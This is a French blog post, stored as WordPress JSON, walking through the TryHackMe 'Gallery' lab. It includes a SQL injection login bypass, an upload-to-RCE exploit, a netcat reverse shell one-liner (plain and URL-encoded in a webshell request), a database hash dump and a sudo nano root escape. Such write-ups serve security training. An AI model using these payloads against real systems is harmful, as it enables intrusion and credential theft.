{"id":1694,"date":"2021-05-24T18:02:46","date_gmt":"2021-05-24T16:02:46","guid":{"rendered":"https:\/\/mikadmin.fr\/blog\/?p=1694"},"modified":"2022-02-12T13:11:23","modified_gmt":"2022-02-12T12:11:23","slug":"tryhackme-gallery","status":"publish","type":"post","link":"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/","title":{"rendered":"[TryHackme] \u2013 Gallery"},"content":{"rendered":"<span class=\"span-reading-time rt-reading-time\" style=\"display: block;\"><span class=\"rt-label rt-prefix\"><\/span> <span class=\"rt-time\"> 4<\/span> <span class=\"rt-label rt-postfix\">min read<\/span><\/span><p>Views: 2997<\/p>\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"219\" height=\"230\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/gallery.png\" alt=\"tryhackme\" class=\"wp-image-2067\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/gallery.png 219w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/gallery-143x150.png 143w\" sizes=\"auto, (max-width: 219px) 100vw, 219px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\"><strong>Lien :<\/strong> <a href=\"https:\/\/tryhackme.com\/room\/batblog\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/tryhackme.com\/room\/gallery<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<h1 class=\"has-text-align-center wp-block-heading\" id=\"web\" style=\"font-size:45px\">[Web]<\/h1>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Dans un premier temps, nous allons effectuer un scan <strong><span style=\"color:#cf2e2e\" class=\"tadv-color\">nmap<\/span><\/strong> afin de d\u00e9couvrir les services disponibles et r\u00e9pondre \u00e0 la premi\u00e8re question.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"234\" height=\"47\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-11.png\" alt=\"\" class=\"wp-image-1705\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-11.png 234w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-11-150x30.png 150w\" sizes=\"auto, (max-width: 234px) 100vw, 234px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"899\" height=\"430\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-20.png\" alt=\"\" class=\"wp-image-2071\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-20.png 899w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-20-300x143.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-20-150x72.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-20-768x367.png 768w\" sizes=\"auto, (max-width: 899px) 100vw, 899px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Il y a donc <strong>2 ports ouverts<\/strong> avec un cms tr\u00e8s int\u00e9ressant sur le port <strong>8080<\/strong> :<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-21.png\" alt=\"\" class=\"wp-image-2073\" width=\"496\" height=\"407\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-21.png 713w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-21-300x246.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-21-150x123.png 150w\" sizes=\"auto, (max-width: 496px) 100vw, 496px\" \/><\/figure><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Ce blog est donc propuls\u00e9 par le cms <a href=\"https:\/\/www.sourcecodester.com\/php\/14903\/simple-image-gallery-web-app-using-php-free-source-code.html\" target=\"_blank\" rel=\"noreferrer noopener\">Simple Image Gallery<\/a><\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"254\" height=\"96\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-22.png\" alt=\"\" class=\"wp-image-2074\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-22.png 254w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-22-150x57.png 150w\" sizes=\"auto, (max-width: 254px) 100vw, 254px\" \/><\/figure><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Apr\u00e8s plusieurs recherches on trouve un exploit d\u00e9j\u00e0 pr\u00e9par\u00e9 sur <a href=\"https:\/\/www.exploit-db.com\/exploits\/50214\" target=\"_blank\" rel=\"noreferrer noopener\">exploit-db<\/a> !<\/p>\n\n\n\n<p><\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Le processus est tr\u00e8s simple :<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Dans un premier temps, il s&rsquo;agit de l&rsquo;exploitation d&rsquo;une <strong><a href=\"https:\/\/portswigger.net\/web-security\/sql-injection\" target=\"_blank\" rel=\"noreferrer noopener\">SQL Injection<\/a><\/strong> sur le formulaire de login :<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"558\" height=\"153\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-23.png\" alt=\"\" class=\"wp-image-2075\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-23.png 558w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-23-300x82.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-23-150x41.png 150w\" sizes=\"auto, (max-width: 558px) 100vw, 558px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Cette derni\u00e8re peut-\u00eatre exploit\u00e9e \u00e9galement \u00e0 la main :<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-markdown\" data-line=\"\"># SQLI Bypass Login\nusername : admin&#039; OR 1=1 -- -\npassword : random<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-24.png\" alt=\"\" class=\"wp-image-2076\" width=\"407\" height=\"302\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-24.png 493w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-24-300x223.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-24-150x111.png 150w\" sizes=\"auto, (max-width: 407px) 100vw, 407px\" \/><\/figure><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Dans un second temps, il s&rsquo;agit d&rsquo;une faille upload permettant une <a href=\"https:\/\/www.bugcrowd.com\/glossary\/remote-code-execution-rce\/\" target=\"_blank\" rel=\"noreferrer noopener\">RCE<\/a> :<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-26-1024x267.png\" alt=\"\" class=\"wp-image-2078\" width=\"967\" height=\"252\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-26-1024x267.png 1024w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-26-300x78.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-26-150x39.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-26-768x200.png 768w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-26.png 1200w\" sizes=\"auto, (max-width: 967px) 100vw, 967px\" \/><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"224\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-27-1024x224.png\" alt=\"\" class=\"wp-image-2079\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-27-1024x224.png 1024w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-27-300x66.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-27-150x33.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-27-768x168.png 768w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-27.png 1197w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\"><\/p>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous allons donc utiliser l&rsquo;exploit pour gagner du temps :<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"324\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-28.png\" alt=\"\" class=\"wp-image-2080\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-28.png 819w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-28-300x119.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-28-150x59.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-28-768x304.png 768w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"986\" height=\"155\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-29.png\" alt=\"\" class=\"wp-image-2081\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-29.png 986w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-29-300x47.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-29-150x24.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-29-768x121.png 768w\" sizes=\"auto, (max-width: 986px) 100vw, 986px\" \/><\/figure><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">C&rsquo;est l&rsquo;heure du reverse shell et pour ce faire nous allons <a href=\"https:\/\/www.urlencoder.org\/\" target=\"_blank\" rel=\"noreferrer noopener\">url encoder<\/a> ce dernier :<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\">rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc 10.11.20.2 1234 &gt;\/tmp\/f<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-markdown\" data-line=\"\"># Payload reverse shell\nhttp:\/\/10.10.7.161\/gallery\/uploads\/1629904320_TagozwrwnipzjxfhroaLetta.php?cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.11.20.2%201234%20%3E%2Ftmp%2Ff<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"505\" height=\"114\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-30.png\" alt=\"\" class=\"wp-image-2082\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-30.png 505w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-30-300x68.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-30-150x34.png 150w\" sizes=\"auto, (max-width: 505px) 100vw, 505px\" \/><\/figure><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Afin de r\u00e9cup\u00e9rer le hash de l&rsquo;administrateur nous devons regarder plus en d\u00e9tail le fichier <strong>initialize.php<\/strong> qui nous donne donc les identifiants de connexion \u00e0 la base de donn\u00e9es :<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"783\" height=\"230\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-32.png\" alt=\"\" class=\"wp-image-2084\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-32.png 783w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-32-300x88.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-32-150x44.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-32-768x226.png 768w\" sizes=\"auto, (max-width: 783px) 100vw, 783px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Apr\u00e8s avoir \u00e9num\u00e9rer cette derni\u00e8re on y trouve bien le hash que l&rsquo;on recherche :<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-sql\" data-line=\"\">mysql -u gallery_user -p\nshow databases;\nuse gallery_db;\nshow tables;\nselect * from users;<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"823\" height=\"232\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-33.png\" alt=\"\" class=\"wp-image-2085\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-33.png 823w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-33-300x85.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-33-150x42.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-33-768x216.png 768w\" sizes=\"auto, (max-width: 823px) 100vw, 823px\" \/><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"375\" height=\"107\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-31.png\" alt=\"\" class=\"wp-image-2083\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-31.png 375w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-31-300x86.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/08\/image-31-150x43.png 150w\" sizes=\"auto, (max-width: 375px) 100vw, 375px\" \/><\/figure><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h1 class=\"has-text-align-center wp-block-heading\" id=\"block-2fba4bbf-317a-4060-99a9-5a26d25c29a0\" style=\"font-size:50px\">[User]<\/h1>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Apr\u00e8s \u00e9num\u00e9ration on trouve un dossier tr\u00e8s int\u00e9ressant dans le r\u00e9pertoire <strong>\/var\/backups<\/strong> :<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"190\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-25.png\" alt=\"\" class=\"wp-image-1723\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-25.png 580w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-25-300x98.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-25-150x49.png 150w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">On peut donc retrouver un <strong>backup<\/strong> d&rsquo;une partie du home de <strong>mike<\/strong> cependant nous pouvons tout lire et m\u00eame le<span style=\"color:#cf2e2e\" class=\"tadv-color\"> <strong>bash_history<\/strong><\/span><strong> <\/strong>qui nous r\u00e9v\u00e8le l&rsquo;erreur de <strong>mike<\/strong>..<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"541\" height=\"424\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-27.png\" alt=\"\" class=\"wp-image-1725\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-27.png 541w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-27-300x235.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-27-150x118.png 150w\" sizes=\"auto, (max-width: 541px) 100vw, 541px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous pouvons donc r\u00e9cup\u00e9rer le flag user gr\u00e2ce au mot de passe de <strong>mike<\/strong>.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"470\" height=\"119\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-28.png\" alt=\"\" class=\"wp-image-1726\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-28.png 470w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-28-300x76.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-28-150x38.png 150w\" sizes=\"auto, (max-width: 470px) 100vw, 470px\" \/><\/figure><\/div>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h1 class=\"has-text-align-center wp-block-heading\" id=\"block-96722ff4-607d-4a95-b543-ef8368bdd8ba\">[Root]<\/h1>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous pouvons voir que <strong>Mike<\/strong> peut lancer un script \u00e0 l&rsquo;aide de <strong><span style=\"color:#9b51e0\" class=\"tadv-color\"><a href=\"https:\/\/mikadmin.fr\/blog\/linux-privilege-escalation-python-library-hijacking\/\" target=\"_blank\" rel=\"noreferrer noopener\">sudo<\/a><\/span><\/strong> et en tant que l&rsquo;utilisateur <strong><span style=\"color:#cf2e2e\" class=\"tadv-color\">root<\/span><\/strong> :<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"167\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-29.png\" alt=\"\" class=\"wp-image-1727\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-29.png 768w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-29-300x65.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-29-150x33.png 150w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous pouvons donc lancer ce dernier avec la commande :<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\">sudo \/bin\/bash \/opt\/rootkit.sh<\/code><\/pre>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous avons donc 4 choix propos\u00e9s :<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"564\" height=\"69\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-30.png\" alt=\"\" class=\"wp-image-1728\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-30.png 564w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-30-300x37.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-30-150x18.png 150w\" sizes=\"auto, (max-width: 564px) 100vw, 564px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Ces choix l\u00e0 sont des param\u00e8tres \u00e0 <a href=\"https:\/\/doc.ubuntu-fr.org\/rkhunter\" target=\"_blank\" rel=\"noreferrer noopener\">rkhunter<\/a>.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"374\" height=\"219\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-31.png\" alt=\"\" class=\"wp-image-1729\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-31.png 374w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-31-300x176.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-31-150x88.png 150w\" sizes=\"auto, (max-width: 374px) 100vw, 374px\" \/><\/figure><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Mais pas le dernier qui nous permet de<strong> lire\/\u00e9diter un report<\/strong>, mais il ne faut pas oublier qu&rsquo;il permet de faire cette action en tant que <strong><span style=\"color:#cf2e2e\" class=\"tadv-color\">root<\/span><\/strong> !<\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous pouvons donc nous aider du fameux <a href=\"https:\/\/gtfobins.github.io\/gtfobins\/nano\/\" target=\"_blank\" rel=\"noreferrer noopener\">GTFOBins<\/a> :<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"897\" height=\"223\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-32.png\" alt=\"\" class=\"wp-image-1730\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-32.png 897w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-32-300x75.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-32-150x37.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-32-768x191.png 768w\" sizes=\"auto, (max-width: 897px) 100vw, 897px\" \/><\/figure><\/div>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\">sudo nano\n^R^X\nreset; sh 1&gt;&amp;0 2&gt;&amp;0<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"645\" height=\"421\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-34.png\" alt=\"\" class=\"wp-image-1732\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-34.png 645w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-34-300x196.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-34-150x98.png 150w\" sizes=\"auto, (max-width: 645px) 100vw, 645px\" \/><\/figure><\/div>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"443\" height=\"169\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-35.png\" alt=\"\" class=\"wp-image-1733\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-35.png 443w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-35-300x114.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2021\/05\/image-35-150x57.png 150w\" sizes=\"auto, (max-width: 443px) 100vw, 443px\" \/><\/figure><\/div>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n","protected":false},"excerpt":{"rendered":"<p><span class=\"span-reading-time rt-reading-time\" style=\"display: block;\"><span class=\"rt-label rt-prefix\"><\/span> <span class=\"rt-time\"> 4<\/span> <span class=\"rt-label rt-postfix\">min read<\/span><\/span>Gallery is a tryhackme room designed by me. You will exploit an SQL injection and deal with a custom script to escalate to the root user. <a href=\"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/\" class=\"more-link\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":45,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_themeisle_gutenberg_block_has_review":false,"footnotes":""},"categories":[4,3],"tags":[64,9,23,78,22,63],"class_list":["post-1694","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-infosec","category-system","tag-cve","tag-linux","tag-privesc","tag-sqli","tag-tryhackme","tag-writeup"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 4.9.9 - aioseo.com -->\n\t<meta name=\"description\" content=\"Can you exploit our image gallery system ? Gallery | Writeup | TryHackMe | SQLi | RCE | CMS | GTFOBins | Linux Privilege Escalation | Pentest\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Mika\"\/>\n\t<meta name=\"keywords\" content=\"tryhackme,batblog,ctf,writeup,pentest,oscp,sudo,privesc,cve,linux,sqli,infosec,system\" \/>\n\t<link rel=\"canonical\" href=\"https:\/\/mikadmin.fr\/blog\/tryhackme-gallery\/\" 